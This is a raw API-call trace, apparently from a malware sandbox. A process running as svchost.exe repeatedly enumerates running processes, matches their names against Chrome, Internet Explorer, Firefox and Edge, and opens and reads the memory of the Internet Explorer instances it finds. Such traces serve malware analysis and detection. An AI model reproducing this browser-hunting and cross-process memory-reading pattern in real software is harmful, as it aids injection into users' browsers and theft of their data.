	[0223.607] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.607] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0223.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5798
	[0223.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.608] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0223.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.608] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.608] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0223.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.609] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.609] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0223.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x579c
	[0223.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.610] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0223.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.610] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.610] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0223.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.611] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.611] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0223.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x57a0
	[0223.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.612] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0223.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.612] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.613] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0223.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.613] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0223.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x57a4
	[0223.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.615] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0223.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.615] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.615] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0223.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.615] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.616] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0223.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x57a8
	[0223.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.616] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0223.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.617] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.617] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0223.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.618] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0223.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x57ac
	[0223.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.619] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0223.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.619] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.620] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0223.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.620] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.621] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0223.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x57b0
	[0223.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.621] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0223.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.622] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.622] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0223.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.622] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0223.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x57b4
	[0223.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.623] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0223.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.623] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.624] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0223.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.624] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0223.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x57b8
	[0223.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.625] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0223.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.626] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.626] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0223.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.627] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0223.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x57bc
	[0223.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.629] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0223.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.629] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.630] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0223.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.630] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0223.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x57c0
	[0223.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.632] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0223.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.632] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.633] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0223.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.633] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.633] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0223.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x57c4
	[0223.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.634] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0223.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.635] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.636] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0223.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.636] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0223.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x57c8
	[0223.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.638] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0223.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.638] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.639] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0223.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.639] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x57cc
	[0223.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.640] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.641] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.641] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.641] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.641] NtQueryInformationProcess (in: ProcessHandle=0x57cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.641] ReadProcessMemory (in: hProcess=0x57cc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.641] ReadProcessMemory (in: hProcess=0x57cc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.642] ReadProcessMemory (in: hProcess=0x57cc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.642] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x57d0
	[0223.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.643] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.643] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.643] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.644] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.644] NtQueryInformationProcess (in: ProcessHandle=0x57d0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.644] ReadProcessMemory (in: hProcess=0x57d0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.644] ReadProcessMemory (in: hProcess=0x57d0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.644] ReadProcessMemory (in: hProcess=0x57d0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.644] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x57d4
	[0223.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.645] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.645] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.646] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.647] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0223.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x57d8
	[0223.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.648] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0223.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.648] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.649] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0223.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.649] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x57dc
	[0223.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.650] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.650] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.651] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.651] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x57e0
	[0223.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.653] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.653] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.653] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.654] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x57e4
	[0223.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.655] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.655] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.655] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.656] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.656] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x57e8
	[0223.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.657] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.657] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.657] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.658] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.658] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0223.659] CloseHandle (hObject=0x4fd0) returned 1
	[0223.659] Sleep (dwMilliseconds=0x64) 
	[0223.768] GetCurrentProcessId () returned 0x110
	[0223.768] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0223.772] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0223.773] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
